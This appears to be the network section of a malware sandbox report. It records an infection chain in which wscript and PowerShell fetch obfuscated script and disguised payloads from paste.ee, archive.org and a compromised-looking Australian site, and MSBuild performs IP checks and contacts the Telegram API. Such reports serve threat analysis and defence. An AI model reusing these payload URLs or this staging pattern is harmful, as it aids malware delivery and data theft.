                                                                                                                                                    Jan 15, 2025 09:58:45.555597067 CET44349741149.154.167.220192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:45.556543112 CET44349741149.154.167.220192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:45.642870903 CET49741443192.168.2.4149.154.167.220
                                                                                                                                                    Jan 15, 2025 09:58:45.763823032 CET49741443192.168.2.4149.154.167.220
                                                                                                                                                    Jan 15, 2025 09:58:45.764230967 CET49741443192.168.2.4149.154.167.220
                                                                                                                                                    Jan 15, 2025 09:58:45.764278889 CET44349741149.154.167.220192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:46.261050940 CET44349741149.154.167.220192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:46.261255980 CET44349741149.154.167.220192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:46.261322975 CET49741443192.168.2.4149.154.167.220
                                                                                                                                                    Jan 15, 2025 09:58:46.285121918 CET49741443192.168.2.4149.154.167.220
                                                                                                                                                    TimestampSource PortDest PortSource IPDest IP
                                                                                                                                                    Jan 15, 2025 09:58:07.955590963 CET5205853192.168.2.41.1.1.1
                                                                                                                                                    Jan 15, 2025 09:58:07.963718891 CET53520581.1.1.1192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:11.362418890 CET6446053192.168.2.41.1.1.1
                                                                                                                                                    Jan 15, 2025 09:58:11.515289068 CET53644601.1.1.1192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:34.688673019 CET6062753192.168.2.41.1.1.1
                                                                                                                                                    Jan 15, 2025 09:58:34.698085070 CET53606271.1.1.1192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:42.764741898 CET6417053192.168.2.41.1.1.1
                                                                                                                                                    Jan 15, 2025 09:58:42.771526098 CET53641701.1.1.1192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:43.361439943 CET5045753192.168.2.41.1.1.1
                                                                                                                                                    Jan 15, 2025 09:58:43.368944883 CET53504571.1.1.1192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:43.981232882 CET5257553192.168.2.41.1.1.1
                                                                                                                                                    Jan 15, 2025 09:58:43.988576889 CET53525751.1.1.1192.168.2.4
                                                                                                                                                    Jan 15, 2025 09:58:44.879777908 CET6397453192.168.2.41.1.1.1
                                                                                                                                                    Jan 15, 2025 09:58:44.887049913 CET53639741.1.1.1192.168.2.4
                                                                                                                                                    TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                                                                                                                                    Jan 15, 2025 09:58:07.955590963 CET192.168.2.41.1.1.10xe281Standard query (0)paste.eeA (IP address)IN (0x0001)false
                                                                                                                                                    Jan 15, 2025 09:58:11.362418890 CET192.168.2.41.1.1.10xda0bStandard query (0)ia600805.us.archive.orgA (IP address)IN (0x0001)false
                                                                                                                                                    Jan 15, 2025 09:58:34.688673019 CET192.168.2.41.1.1.10x8b30Standard query (0)melbournedistillers.com.auA (IP address)IN (0x0001)false
                                                                                                                                                    Jan 15, 2025 09:58:42.764741898 CET192.168.2.41.1.1.10x46fcStandard query (0)icanhazip.comA (IP address)IN (0x0001)false
                                                                                                                                                    Jan 15, 2025 09:58:43.361439943 CET192.168.2.41.1.1.10xb067Standard query (0)121.205.6.0.in-addr.arpaPTR (Pointer record)IN (0x0001)false
                                                                                                                                                    Jan 15, 2025 09:58:43.981232882 CET192.168.2.41.1.1.10xaa5eStandard query (0)ip-api.comA (IP address)IN (0x0001)false
                                                                                                                                                    Jan 15, 2025 09:58:44.879777908 CET192.168.2.41.1.1.10x75aeStandard query (0)api.telegram.orgA (IP address)IN (0x0001)false
                                                                                                                                                    TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                                                                                                                                    Jan 15, 2025 09:58:07.963718891 CET1.1.1.1192.168.2.40xe281No error (0)paste.ee23.186.113.60A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 15, 2025 09:58:11.515289068 CET1.1.1.1192.168.2.40xda0bNo error (0)ia600805.us.archive.org207.241.227.155A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 15, 2025 09:58:23.601960897 CET1.1.1.1192.168.2.40x7cfcNo error (0)bg.microsoft.map.fastly.net199.232.214.172A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 15, 2025 09:58:23.601960897 CET1.1.1.1192.168.2.40x7cfcNo error (0)bg.microsoft.map.fastly.net199.232.210.172A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 15, 2025 09:58:34.698085070 CET1.1.1.1192.168.2.40x8b30No error (0)melbournedistillers.com.au162.241.87.113A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 15, 2025 09:58:42.771526098 CET1.1.1.1192.168.2.40x46fcNo error (0)icanhazip.com104.16.184.241A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 15, 2025 09:58:42.771526098 CET1.1.1.1192.168.2.40x46fcNo error (0)icanhazip.com104.16.185.241A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 15, 2025 09:58:43.368944883 CET1.1.1.1192.168.2.40xb067Name error (3)121.205.6.0.in-addr.arpanonenonePTR (Pointer record)IN (0x0001)false
                                                                                                                                                    Jan 15, 2025 09:58:43.988576889 CET1.1.1.1192.168.2.40xaa5eNo error (0)ip-api.com208.95.112.1A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 15, 2025 09:58:44.887049913 CET1.1.1.1192.168.2.40x75aeNo error (0)api.telegram.org149.154.167.220A (IP address)IN (0x0001)false
                                                                                                                                                    Jan 15, 2025 09:59:00.540895939 CET1.1.1.1192.168.2.40x6a05No error (0)shed.dual-low.s-part-0017.t-0009.t-msedge.nets-part-0017.t-0009.t-msedge.netCNAME (Canonical name)IN (0x0001)false
                                                                                                                                                    Jan 15, 2025 09:59:00.540895939 CET1.1.1.1192.168.2.40x6a05No error (0)s-part-0017.t-0009.t-msedge.net13.107.246.45A (IP address)IN (0x0001)false
                                                                                                                                                    • paste.ee
                                                                                                                                                    • ia600805.us.archive.org
                                                                                                                                                    • melbournedistillers.com.au
                                                                                                                                                    • api.telegram.org
                                                                                                                                                    • icanhazip.com
                                                                                                                                                    • ip-api.com
                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    0192.168.2.449739104.16.184.241803412C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Jan 15, 2025 09:58:42.884572983 CET63OUTGET / HTTP/1.1
                                                                                                                                                    Host: icanhazip.com
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Jan 15, 2025 09:58:43.351929903 CET535INHTTP/1.1 200 OK
                                                                                                                                                    Date: Wed, 15 Jan 2025 08:58:43 GMT
                                                                                                                                                    Content-Type: text/plain
                                                                                                                                                    Content-Length: 13
                                                                                                                                                    Connection: keep-alive
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Access-Control-Allow-Methods: GET
                                                                                                                                                    Set-Cookie: __cf_bm=rQduDmPfcyCRl7HauDlcVo7YvFzyjs24kLpf4DW1q1M-1736931523-1.0.1.1-Uwle4rVKk959zdXYXd3w5btaeZY6gGkt0Esxyga2j0831zemKnFszf1vOpTRI6ooEAdy7FSx3dGgR8fEwF1YhA; path=/; expires=Wed, 15-Jan-25 09:28:43 GMT; domain=.icanhazip.com; HttpOnly
                                                                                                                                                    Server: cloudflare
                                                                                                                                                    CF-RAY: 9024aa64a9510cac-EWR
                                                                                                                                                    alt-svc: h3=":443"; ma=86400
                                                                                                                                                    Data Raw: 38 2e 34 36 2e 31 32 33 2e 31 38 39 0a
                                                                                                                                                    Data Ascii: 8.46.123.189


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    1192.168.2.449740208.95.112.1803412C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    Jan 15, 2025 09:58:43.994294882 CET80OUTGET /line/?fields=hosting HTTP/1.1
                                                                                                                                                    Host: ip-api.com
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    Jan 15, 2025 09:58:44.449089050 CET175INHTTP/1.1 200 OK
                                                                                                                                                    Date: Wed, 15 Jan 2025 08:58:44 GMT
                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                    Content-Length: 6
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    X-Ttl: 60
                                                                                                                                                    X-Rl: 44
                                                                                                                                                    Data Raw: 66 61 6c 73 65 0a
                                                                                                                                                    Data Ascii: false


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    0192.168.2.44973023.186.113.604436776C:\Windows\System32\wscript.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-15 08:58:08 UTC322OUTGET /d/rVRbIsie HTTP/1.1
                                                                                                                                                    Accept: */*
                                                                                                                                                    Accept-Language: en-ch
                                                                                                                                                    UA-CPU: AMD64
                                                                                                                                                    Accept-Encoding: gzip, deflate
                                                                                                                                                    User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 10.0; Win64; x64; Trident/7.0; .NET4.0C; .NET4.0E; .NET CLR 2.0.50727; .NET CLR 3.0.30729; .NET CLR 3.5.30729)
                                                                                                                                                    Host: paste.ee
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    2025-01-15 08:58:09 UTC953INHTTP/1.1 200 OK
                                                                                                                                                    Server: nginx/1.18.0 (Ubuntu)
                                                                                                                                                    Date: Wed, 15 Jan 2025 08:58:08 GMT
                                                                                                                                                    Content-Type: text/plain; charset=utf-8
                                                                                                                                                    Content-Length: 6646
                                                                                                                                                    Connection: close
                                                                                                                                                    Vary: Accept-Encoding
                                                                                                                                                    Cache-Control: max-age=2592000
                                                                                                                                                    X-Varnish: 49407751 47973727
                                                                                                                                                    Age: 19881
                                                                                                                                                    Via: 1.1 varnish (Varnish/6.2)
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Strict-Transport-Security: max-age=63072000
                                                                                                                                                    X-Frame-Options: DENY
                                                                                                                                                    X-Content-Type-Options: nosniff
                                                                                                                                                    X-XSS-Protection: 1; mode=block
                                                                                                                                                    Content-Security-Policy: default-src 'self'; script-src 'self' 'unsafe-inline' 'unsafe-eval' https://cdnjs.cloudflare.com https://www.google.com https://www.gstatic.com https://analytics.paste.ee; img-src 'self' https://secure.gravatar.com https://analytics.paste.ee data:; style-src 'self' 'unsafe-inline' https://fonts.googleapis.com https://cdnjs.cloudflare.com; font-src 'self' https://themes.googleusercontent.com https://fonts.gstatic.com; frame-src https://www.google.com; object-src 'none'
                                                                                                                                                    2025-01-15 08:58:09 UTC6646INData Raw: 62 6f 74 74 6c 65 68 65 61 64 20 3d 20 7b 0d 0a 20 20 20 20 63 61 63 6f 74 6f 70 69 61 3a 20 22 41 42 43 44 45 46 47 48 49 4a 4b 4c 4d 4e 4f 50 51 52 53 54 55 56 57 58 59 5a 61 62 63 64 65 66 67 68 69 6a 6b 6c 6d 6e 6f 70 71 72 73 74 75 76 77 78 79 7a 30 31 32 33 34 35 36 37 38 39 2b 2f 3d 22 2c 0d 0a 20 20 20 20 64 65 63 6f 64 65 3a 20 66 75 6e 63 74 69 6f 6e 28 6d 65 6e 73 74 72 75 61 74 69 6f 6e 29 20 7b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 64 65 63 6f 64 65 64 53 74 72 69 6e 67 20 3d 20 22 22 3b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 64 72 6f 6e 65 2c 20 77 68 6f 70 70 65 64 2c 20 64 72 6f 73 6b 79 3b 0d 0a 20 20 20 20 20 20 20 20 76 61 72 20 77 68 6f 6c 65 68 65 61 72 74 65 64 2c 20 70 72 6f 74 6f 73 75 6c 70 68 61 74 65 2c 20 75 6e 6b 6e 69
                                                                                                                                                    Data Ascii: bottlehead = { cacotopia: "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789+/=", decode: function(menstruation) { var decodedString = ""; var drone, whopped, drosky; var wholehearted, protosulphate, unkni


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    1192.168.2.449731207.241.227.1554432596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-15 08:58:12 UTC112OUTGET /10/items/new_image_202501/new_image.jpg HTTP/1.1
                                                                                                                                                    Host: ia600805.us.archive.org
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    2025-01-15 08:58:12 UTC582INHTTP/1.1 200 OK
                                                                                                                                                    Server: nginx/1.24.0
                                                                                                                                                    Date: Wed, 15 Jan 2025 08:58:12 GMT
                                                                                                                                                    Content-Type: image/jpeg
                                                                                                                                                    Content-Length: 2759301
                                                                                                                                                    Last-Modified: Tue, 14 Jan 2025 14:24:50 GMT
                                                                                                                                                    Connection: close
                                                                                                                                                    ETag: "678673b2-2a1a85"
                                                                                                                                                    Strict-Transport-Security: max-age=15724800
                                                                                                                                                    Expires: Wed, 15 Jan 2025 14:58:12 GMT
                                                                                                                                                    Cache-Control: max-age=21600
                                                                                                                                                    Access-Control-Allow-Origin: *
                                                                                                                                                    Access-Control-Allow-Headers: Accept-Encoding,Accept-Language,Authorization,Cache-Control,Content-Length,Content-Range,DNT,Pragma,Range,X-Requested-With
                                                                                                                                                    Access-Control-Allow-Credentials: true
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    2025-01-15 08:58:12 UTC15802INData Raw: ff d8 ff e0 00 10 4a 46 49 46 00 01 01 00 00 01 00 01 00 00 ff db 00 43 00 08 06 06 07 06 05 08 07 07 07 09 09 08 0a 0c 14 0d 0c 0b 0b 0c 19 12 13 0f 14 1d 1a 1f 1e 1d 1a 1c 1c 20 24 2e 27 20 22 2c 23 1c 1c 28 37 29 2c 30 31 34 34 34 1f 27 39 3d 38 32 3c 2e 33 34 32 ff db 00 43 01 09 09 09 0c 0b 0c 18 0d 0d 18 32 21 1c 21 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 32 ff c0 00 11 08 04 38 07 80 03 01 22 00 02 11 01 03 11 01 ff c4 00 1c 00 00 02 03 01 01 01 01 00 00 00 00 00 00 00 00 00 03 04 01 02 05 00 06 07 08 ff c4 00 55 10 00 02 02 01 03 02 04 03 05 06 03 05 06 02 01 15 01 02 03 11 00 04 12 21 31 41 05 13 22 51 61 71 81 06 14 32 91 a1 07 23 42 b1 c1
                                                                                                                                                    Data Ascii: JFIFC $.' ",#(7),01444'9=82<.342C2!!222222222222222222222222222222222222222222222222228"U!1A"Qaq2#B
                                                                                                                                                    2025-01-15 08:58:12 UTC16384INData Raw: 47 be 05 cf 22 c0 07 38 32 ed 0b c6 e0 78 c1 a8 76 2c e0 73 f9 61 20 0c c7 70 55 3f cf 00 eb 1b 86 0c 0d 31 5e e7 8c e4 29 1e e6 6b 69 5b d8 70 72 c4 b3 10 2a 82 8e 4d e0 47 a6 62 58 d8 a2 54 e0 5e 49 dd 95 6c b0 53 fa 65 e2 d4 2a 46 51 ad af 80 cd cf e5 80 33 21 52 a5 e9 6b f5 ca 39 67 e5 47 00 50 1e df 1c 06 91 bd 24 86 3f 4c 24 40 3b 04 1c dd d6 e3 f0 c0 23 05 88 1e 0d 8f d7 02 93 94 d4 2b d5 1b e9 81 a1 b9 3c 9d b2 39 dc 0f 16 7a 62 9a 92 24 22 9c d1 fc 36 7a e1 89 49 05 14 1d 48 27 03 ab 89 51 15 43 02 57 91 80 b7 96 fd bf 5c 6a 20 90 28 66 66 b3 cd 1e 99 10 4a be 71 63 f8 55 7f 8b f5 c8 9e 44 6a 23 6d 37 42 7d b0 0d e7 92 0d bb 12 4f 45 ed 83 92 41 b0 02 ec c7 e3 ef 96 8d 50 28 a2 02 f5 e3 be 53 52 51 3d 65 c6 eb bd b8 0b 33 82 a5 18 b5 55 83 ec 7d
                                                                                                                                                    Data Ascii: G"82xv,sa pU?1^)ki[pr*MGbXT^IlSe*FQ3!Rk9gGP$?L$@;#+<9zb$"6zIH'QCW\j (ffJqcUDj#m7B}OEAP(SRQ=e3U}
                                                                                                                                                    2025-01-15 08:58:12 UTC16384INData Raw: a1 3b 95 d2 16 65 27 e6 06 0a 2f 0e f1 0d 0f 8f f8 64 b2 e9 75 10 ee d4 25 6f 8d 97 70 0c b7 57 d7 ae 2b 21 6b 27 92 47 7c d4 fb 3f ae 74 f1 1d 26 9e 42 cf a6 79 d4 98 77 1d bb 89 00 30 07 a3 02 01 b1 c9 02 ba 1c 00 78 dd ff 00 b6 f5 fe 9e ba 89 2c 1f f7 8e 1b 41 e3 9e 23 a1 d2 88 74 fa 92 91 6e b0 0a 2b 57 e6 0e 03 c6 01 6f 1a d7 32 93 c6 a2 4b e7 fc c7 33 c3 ed 97 61 36 18 5f 07 a6 07 a6 d1 f8 f4 fe 31 aa 8f c3 bc 61 56 7d 3c cc aa a4 22 86 89 b9 0a ca 45 01 cd 5f c2 f0 2f 14 de 0b e2 3a bd 0d 40 ec 84 05 9d 92 da 98 58 2a 4d 55 83 ce 61 c2 83 cd 56 de 45 1b 0d 79 e9 7e da c8 f0 78 f4 25 4b 2a 9d 3a 8a aa 06 99 bf 97 1f a6 07 98 9a 18 b4 85 d1 f8 5d ea 49 db 5b b8 26 f1 b1 a7 46 98 ea 0b ab 44 57 f0 90 3a 64 c3 f6 76 79 cc 9a 8d 7c a9 a3 d3 1d 8e 66 9c
                                                                                                                                                    Data Ascii: ;e'/du%opW+!k'G|?t&Byw0x,A#tn+Wo2K3a6_1aV}<"E_/:@X*MUaVEy~x%K*:]I[&FDW:dvy|f
                                                                                                                                                    2025-01-15 08:58:12 UTC16384INData Raw: 29 b1 cc 21 4f b1 fe 77 9a 3a 96 d3 ed 06 fb 70 69 b0 11 ea 74 db 76 b3 57 3f e1 38 0a b2 c9 cb 15 04 b5 55 fc 06 39 a6 49 be ec c1 17 82 cc 48 6e 30 f2 b4 11 c4 24 0f 61 85 01 75 fa 60 e2 d7 c0 20 08 ec 45 7b 59 c0 16 e9 d8 10 a2 89 14 64 26 eb e0 32 57 4c f1 ca ae 3d 36 6c 0f 6e 2b 18 fb de 89 b8 46 2b e9 e1 48 3d 70 08 e8 eb 3e f6 3e a3 e9 ab f6 c0 12 e8 a4 3b 1c 1b 6d c4 9f 95 e7 0d 14 aa 9e c7 69 04 7b f5 1f d7 35 11 22 58 b6 86 6b be fe fc 65 e2 96 14 62 19 bd 4b d7 03 cf b8 78 ea 27 15 4c 0e 14 c6 ec 84 85 55 52 78 db d3 eb 9a 3a df ba 6a 01 b7 da dd 8e d3 c6 00 41 0a c2 b1 19 18 1b dc 4e d3 ce 00 19 a6 50 18 1b 53 c0 c6 00 d4 14 b1 dc 64 89 60 69 04 00 b0 03 ad a9 e7 19 33 e9 e3 50 bb bd 38 09 aa 4c e8 76 36 ea eb f0 ca 08 5d b8 61 7c 63 e9 e4 28
                                                                                                                                                    Data Ascii: )!Ow:pitvW?8U9IHn0$au` E{Yd&2WL=6ln+F+H=p>>;mi{5"XkebKx'LURx:jANPSd`i3P8Lv6]a|c(
                                                                                                                                                    2025-01-15 08:58:12 UTC16384INData Raw: ad a6 0c 47 bb ff 00 fa 38 3d 4f 89 22 91 5a 52 40 eb 4f c7 f2 c0 d7 7d 44 25 54 02 d4 0f 3f 1c ef 32 33 54 8d f3 39 95 1e ba 29 53 71 d3 6d 07 a7 af fe 98 47 f1 08 c4 60 22 50 1f e6 ff 00 a6 03 af 22 75 22 89 e9 83 f3 d7 a1 4e 7b 1c cf 7d 68 75 07 cb 22 bb 06 eb ff 00 87 21 35 eb e6 57 92 47 c4 b7 fd 30 34 9d d1 9a ca 9e 7d b2 a5 c8 53 b5 5b eb 8b 36 b9 0a f0 95 ff 00 17 fd 32 a7 5e 40 a1 16 ef f8 bf e9 80 c1 d4 99 14 54 75 b7 f5 cb 89 14 29 40 80 1f c5 ce 27 f7 b7 5f 56 ca f8 06 ff 00 a6 0d b5 e7 ff 00 a3 62 7a fe 2f ff 00 47 01 d4 74 0c 09 8c dd f4 ae 0e 2d ac d7 3c 5a a2 13 d2 80 70 36 8c 85 d6 b6 d2 44 6c 19 45 82 5b fe 98 87 9c 4b 16 91 37 b3 1b fc 5f f4 c0 68 f8 d4 a7 d2 63 52 7b 15 5c d8 8e 7f 07 6d 27 df 75 69 e2 91 b1 90 a2 ac 2e ae 15 68 10 4d
                                                                                                                                                    Data Ascii: G8=O"ZR@O}D%T?23T9)SqmG`"P"u"N{}hu"!5WG04}S[62^@Tu)@'_Vbz/Gt-<Zp6DlE[K7_hcR{\m'ui.hM
                                                                                                                                                    2025-01-15 08:58:12 UTC16384INData Raw: dd fa 71 db 28 20 6b 1b 9a d7 b5 60 32 91 16 76 51 b4 13 c2 8a eb 81 24 28 0a 0f e2 a3 5e fc e5 cb 32 15 60 f4 cb 8b 44 18 b0 bf 87 5f 9e 03 29 50 c6 ad ba c0 52 48 3f 3c be e1 aa 5d d5 b4 fb 60 a2 47 a2 4a d8 ae 8d c7 7c 22 c8 aa 28 0a 6f 81 c0 b1 57 24 10 d4 47 53 87 57 91 88 3c 16 e9 f1 ca c1 44 96 91 7d 23 93 c6 04 38 7b 02 c0 dc 5b 03 b5 6b 24 8f c8 2a 40 af 4a 91 78 ba 3c a9 48 59 b6 f4 17 d1 72 da 90 59 82 bb 8a ab 06 b2 fa 04 3f 79 8e a3 0c 03 03 fa e0 34 08 89 01 12 2b 33 75 bc 21 77 48 c8 2c a4 13 5e ac d5 83 cc 9a 59 42 ac 4d e6 44 19 c0 61 e8 3e ae 38 e6 fe 58 4d 52 99 fc 3c e9 d4 ed 2a b7 f8 89 ba 20 fe 74 0e 07 9e 96 14 f3 55 22 94 c8 59 80 65 b0 36 f4 c9 d4 ab e9 da 45 56 14 a6 95 94 7c 7a 7f 2c 79 3c 3d 9d 16 5d aa 8a 58 92 43 15 24 76 1f
                                                                                                                                                    Data Ascii: q( k`2vQ$(^2`D_)PRH?<]`GJ|"(oW$GSW<D}#8{[k$*@Jx<HYrY?y4+3u!wH,^YBMDa>8XMR<* tU"Ye6EV|z,y<=]XC$v
                                                                                                                                                    2025-01-15 08:58:12 UTC16384INData Raw: 36 a9 a8 b4 32 d5 75 2a 70 b1 47 3a a3 20 d3 cb 4c 45 1d 97 5f a6 07 a3 9b 5a 9f 7a 84 c7 a6 02 37 45 90 33 b7 3c a8 f6 f9 e4 6a 66 79 19 a5 90 d0 03 90 00 20 01 81 82 37 5f 28 36 9b 51 21 1b 55 58 23 70 4a a8 e9 f9 e0 b5 d0 eb 1e 53 a7 5d 24 e5 14 06 94 aa 9b db 63 b6 04 69 99 35 13 2e a7 63 80 a4 aa 5f 17 c7 5c 63 c4 66 6d 1e 81 a4 85 dd 0b cc a5 97 cc 62 39 0c 7e 9d 4e 5b 4b 1c f3 32 a4 3a 69 4c 61 7d 2d e5 92 00 ec 3e 78 f4 f0 6a 53 c3 a7 12 68 e7 7d ae 80 a9 8c 83 c2 b5 9a ae 70 32 f4 1a 99 1c c9 01 05 98 b1 75 05 89 0c 09 ec 6e bf 3c 7a 3d 76 ad 19 55 f4 c6 23 b8 ab 30 91 78 5a e9 c1 cc a8 23 99 b5 60 e9 74 1a 99 02 16 2d 4a 40 ab e3 68 ed 9a 69 0e b9 d9 07 dc a6 48 d8 ee 2a c8 d7 7d b9 aa eb 58 0d e9 e4 4d 4f 88 c6 f2 28 56 0e a7 72 f1 47 eb d7 8c
                                                                                                                                                    Data Ascii: 62u*pG: LE_Zz7E3<jfy 7_(6Q!UX#pJS]$ci5.c_\cfmb9~N[K2:iLa}->xjSh}p2un<z=vU#0xZ#`t-J@hiH*}XMO(VrG
                                                                                                                                                    2025-01-15 08:58:12 UTC16384INData Raw: 8e 94 b0 3c 55 fd 2e b2 de 58 0d b7 b8 6d a4 60 54 48 c0 83 67 82 0f 5e f9 01 ab a0 00 f4 04 75 c9 d8 0d 1b e0 93 fa 64 98 c9 23 6d 74 bb 26 b8 fa e0 54 b5 8e 7e 1c fc 32 18 b3 12 4f 5b cb f9 2c 5c a8 f5 10 2f d3 cf f2 c8 75 28 05 d8 24 5d 1f 9e 00 fe 99 c3 83 91 59 20 73 cf 4c 0b 33 16 1c b1 35 d2 fd b2 bd 0e 47 7c be df 48 3e fd 30 2e 93 15 52 0f 26 b8 bc d6 d0 ea 36 78 26 a6 32 dc b3 3d 7b 9b 51 98 80 73 9b da 5d 31 8f c2 64 2e ca 5a 51 e9 e3 91 b9 40 1f cf 03 08 83 66 fa fc f0 91 32 a9 16 47 5e f8 c7 fb 3a 63 e5 01 b4 17 2c 28 9f c2 57 ad e7 1d 0c 8a 81 88 52 4a ef 23 9f c3 ef d2 b0 28 fa 97 3b 68 f0 16 be 7c e0 0b b7 62 40 cd 3f f6 5f 96 17 cc 7b 25 c2 0a e3 93 f1 fa e2 b2 69 4a 5f ac 1b 24 55 f3 c7 bd 60 00 4c 7c b2 a4 93 ea b0 09 e3 25 27 75 72 43
                                                                                                                                                    Data Ascii: <U.Xm`THg^ud#mt&T~2O[,\/u($]Y sL35G|H>0.R&6x&2={Qs]1d.ZQ@f2G^:c,(WRJ#(;h|b@?_{%iJ_$U`L|%'urC
                                                                                                                                                    2025-01-15 08:58:12 UTC16384INData Raw: 65 1c 85 60 4f 5b 6b fe 99 c5 3d 36 bc e7 20 05 1e fa ed e3 f3 18 16 03 cc 56 35 c2 8b eb 94 11 bb 29 2a 09 03 db 2a 2d 6c 13 5e e3 0a 26 db 13 22 9a dc 6c e0 04 06 3d 2f 25 56 cd 75 3e d8 53 3f ee d5 02 28 2b d1 80 e4 e7 42 ae cc 4a ae ea 16 6b f2 c0 8f 2d fa 9e 3e 67 fa e5 41 60 76 92 7a 8e 87 0a 8e f0 4d b8 a6 ea 04 15 71 ee 2b 91 95 92 51 34 e1 c2 aa 5d 0a ed 80 c3 99 c5 4b 23 bf 50 48 36 2b 9f ed ed 93 1f 88 49 f8 4b b2 93 54 77 1c 9d 74 85 8a a9 bb 0b b4 7a b7 0e d4 6f e4 71 51 03 34 05 c7 63 58 1b ba 4f 10 91 34 72 15 91 9e 4d a1 68 b1 f7 ab 1f a6 35 ab d6 4b f7 69 5a 19 59 77 39 a0 77 5f 40 4f 73 c8 00 f3 55 9e 6a 09 8c 3b 88 e6 c5 57 6e 08 39 b3 0f 8a c3 a8 d3 b4 73 22 06 dc cc 5d ae e8 d0 a1 5c f2 2c 7d 70 18 07 57 ad 53 23 6a da 35 44 24 ed 6d
                                                                                                                                                    Data Ascii: e`O[k=6 V5)**-l^&"l=/%Vu>S?(+BJk->gA`vzMq+Q4]K#PH6+IKTwtzoqQ4cXO4rMh5KiZYw9w_@OsUj;Wn9s"]\,}pWS#j5D$m
                                                                                                                                                    2025-01-15 08:58:12 UTC16384INData Raw: e7 69 e8 73 22 79 c6 ae 09 64 50 54 a8 16 b7 67 93 5f d7 01 e2 91 bb 34 77 41 ba 8f 7c 6e 1d 12 41 a7 54 46 b5 26 d8 5d 58 cc e4 d3 38 86 4a 2d 6a a5 aa b9 e9 8f c0 e4 68 61 06 b7 6c 05 ad 79 e9 80 e4 3a d5 82 0a 2c cc aa 0a 84 02 c9 17 c1 fa 63 47 50 82 16 6d aa 48 ea 6e ae c7 71 98 da c1 10 d3 87 2c 48 50 58 02 d4 2c f0 3f 5c 2e a5 1c f8 7a f9 8c c9 24 71 d8 65 66 04 10 2f 9e 70 3b 57 af 82 02 db d2 46 90 11 c0 52 36 8f 70 7a 65 22 68 e5 1b fc d0 e8 bf 85 80 b2 3e bf 5c 8d 24 b3 b4 65 66 f2 d9 50 2b 33 51 e4 37 c4 e6 66 b3 53 16 96 79 74 ba 78 94 2a bd 6e 1c dd 7c f0 36 5e 78 a1 87 71 5d e7 f8 16 e8 93 81 2a e3 f1 9b 24 6e f4 f4 53 ed 78 a2 b1 9a 1d 36 a6 28 0a 48 f3 aa 31 56 bd dc 1e d9 ab a9 46 d3 c4 01 52 64 24 80 a4 f2 7a 7e 7e f8 19 92 e9 55 d6 49
                                                                                                                                                    Data Ascii: is"ydPTg_4wA|nATF&]X8J-jhaly:,cGPmHnq,HPX,?\.z$qef/p;WFR6pze"h>\$efP+3Q7fSytx*n|6^xq]*$nSx6(H1VFRd$z~~UI


                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                    2192.168.2.449738162.241.87.1134432596C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                    2025-01-15 08:58:35 UTC88OUTGET /file/114.txt HTTP/1.1
                                                                                                                                                    Host: melbournedistillers.com.au
                                                                                                                                                    Connection: Keep-Alive
                                                                                                                                                    2025-01-15 08:58:35 UTC210INHTTP/1.1 200 OK
                                                                                                                                                    Date: Wed, 15 Jan 2025 08:58:35 GMT
                                                                                                                                                    Server: Apache
                                                                                                                                                    Last-Modified: Tue, 14 Jan 2025 20:29:55 GMT
                                                                                                                                                    Accept-Ranges: bytes
                                                                                                                                                    Content-Length: 1221976
                                                                                                                                                    Connection: close
                                                                                                                                                    Content-Type: text/plain
